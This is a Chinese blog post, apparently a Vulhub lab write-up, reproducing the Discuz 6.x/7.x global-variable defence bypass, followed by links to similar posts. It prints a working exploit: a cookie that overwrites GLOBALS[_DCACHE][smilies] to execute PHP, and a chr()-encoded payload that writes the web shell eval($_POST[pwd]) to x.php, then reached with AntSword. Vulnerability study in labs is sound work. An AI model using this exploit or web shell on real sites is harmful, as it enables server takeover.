Discuz 7.x/6.x 全局变量防御绕过导致代码执行

于 2021-12-05 17:54:27 发布
阅读量2.4k 收藏
点赞数
分类专栏: vulhub 文章标签: web安全 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_41048303/article/details/121732649
版权
本文详述了PHP 5.3x版本Discuz论坛存在的全局变量防御绕过漏洞,通过安装过程演示如何在安装后利用Cookie注入实现eval执行,包括漏洞环境搭建、复现步骤和具体脚本操作。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.漏洞原理

​ 由于php5.3 x版本里php.ini的设置request_order默认值为GP,导致Discuz 6.x/7.x全局变量防御绕过漏洞。

2.漏洞环境

​ 执行docker-compose up -d 启动后,访问http://192.168.254.202:8080/install来安装discuz

​ 数据库地址db,数据库名为discuz,数据库账号密码均为root

在这里插入图片描述

3.漏洞复现

安装成功后,直接找一个已存在的帖子,向其发送数据包,并在Cookie中增加GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();

GET /viewthread.php?tid=13&extra=page%3D1 HTTP/1.1
Host: 192.168.254.202:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.254.202:8080/forumdisplay.php?fid=2
Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();
Upgrade-Insecure-Requests: 1

在这里插入图片描述

写入一句话脚本:eval(fputs(fopen('x.php','w'),'<?php @eval($_POST[pwd])?>');));

转成ASCII码形式

chr(101).chr(118).chr(97).chr(108).chr(40).chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(120).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(112).chr(119).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(41).chr(59)

使用Burp 修改数据包
在这里插入图片描述

使用蚁剑链接目标服务器
在这里插入图片描述
在这里插入图片描述

利用Vulnhub复现漏洞 - Discuz 7.x/6.x 全局变量防御绕过导致代码执行
JiangBuLiu的博客
06-28 965
Discuz 7.x/6.x 全局变量防御绕过导致代码执行Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/httpd/ssi-rce/ 漏洞原理 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过...
Discuz 7.x、6.x 全局变量防御绕过导致代码执行
浅笑996的博客
11-25 1211
0x01 分析 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致REQUEST中不再包含_REQUEST中不再包含R​EQUEST中不再包含_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。 具体原理请参考: https://www.secpulse.com/archives/2338.html 0x02 环境...
Discuz 7.x/6.x 代码执行
haha1314的博客
08-10 514
Discuz 7.x/6.x 全局变量防御绕过导致代码执行 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。 漏洞复现 安装成功后,直接找一个已存在的帖子,向其发送数据包,并在Cookie中增加GLOBALS[_DCACHE][sm...
全局变量防御绕过漏洞演示
Chenamao的博客
08-09 527
目录 全局变量防御绕过漏洞演示 漏洞环境搭建Vulhub Docker简介: 搭建步骤: 让我们漏洞复现一下子: 全局变量防御绕过漏洞演示 漏洞环境搭建Vulhub 一款基于docker和docker-compose的漏洞环境部署平台。 vulhub官网地址:https://vulhub.org Docker简介: 是一个开源的应用容器引擎,基于Go语言并遵从Apache2.0协议开源。 可以让开发者打包到他们的应用以及依赖包到一个轻量级、可移植的容器中,然后发布到任何流行的Linu
SERVER全局变量绕过
最新发布
09-03
6.x/7.x 全局变量防御绕过导致命令执行](https://blog.csdn.net/weixin_42361708/article/details/115651776)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
Discuz! 6.x/7.x 全局变量防御绕过导致命令执行
aixuan9365的博客
05-29 286
参考:http://wooyun.jozxing.cc/static/bugs/wooyun-2014-080723.html 文件位于:include/discuzcode.func.php 第97-241行 函数 discuzcode() 有这么一句话,$GLOBALS['_DCACHE']['smilies']['searcharray'], $GLOBALS['...
Discuz!7.X 0day漏洞利用工具
03-04
Discuz!7.X 0day漏洞利用工具分享下!
绕过全局变量防御导致代码执行
weixin_55541277的博客
06-18 325
[wooyun-2010-080723] 绕过全局变量防御导致代码执行 文章旨在记录个人收获以及知识分享,十分欢迎各位大佬纠正和补充 1.漏洞介绍 如果已经开启了 regeister_globals 配置,且在php5.3.x版本中 request_order配置默认为GP,导致Discuz7.x/6.x版本可以绕过全局变量防御 regeister_globals 决定是否将EGPCS(即 Environment,Get,Post,Cookie,Server )变量注册为全局变量 request_or
php7全局变量漏洞,Discuz! 6.x/7.x 全局变量防御绕过导致命令执行
weixin_42361708的博客
03-12 368
漏洞概述:由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致Discuz! 6.x/7.x 全局变量防御绕过漏洞。漏洞分析:include/global.func.php代码里:functiondaddslashes($string,$force=0){!defined('MAGIC_QUOTES_GPC')&&define(...
Discuz 6.x 7.x 全局变量防御绕过导致代码执行漏洞复现(超级详细)
weixin_45819911的博客
07-15 884
Discuz 6.x 7.x 全局变量防御绕过导致代码执行漏洞复现 闲谈: 其实自己做个不少漏洞复现,但是一直没好意思发,后来我发现了,不发出来我写他干嘛?(反正也没人看) 0x00 漏洞概述: 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致REQUEST中不再包含_REQUEST中不再包含R​EQUEST中不再包含_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。 0x01 前置条件: php版本:php5.3.x
Discuz 7.x6.x 全局变量防御绕过导致代码执行(wooyun-2010-080723)
黑白的博客
12-06 618
声明 好好学习,天天向上 漏洞描述 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致REQUEST中不再包含_REQUEST中不再包含R​EQUEST中不再包含_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。 影响范围 6.x 7.x 复现过程 使用vulhub 这里使用7.2版本 cd /app/vulhub-master/discuz/wooyun-2010-080723 启动 docker-compose
Discuz全局变量防御绕过导致代码执行getshell
ADummy的博客
02-05 633
Discuz 7.x/6.x 全局变量防御绕过导致代码执行 by ADummy 0x00利用路线 ​ Discuz任意帖子页面—>cookie注入命令—>命令执行(phpinfo()或eval一句话)—>getshell 0x01漏洞介绍 ​ 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞 ​ 影响版本 Dis
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值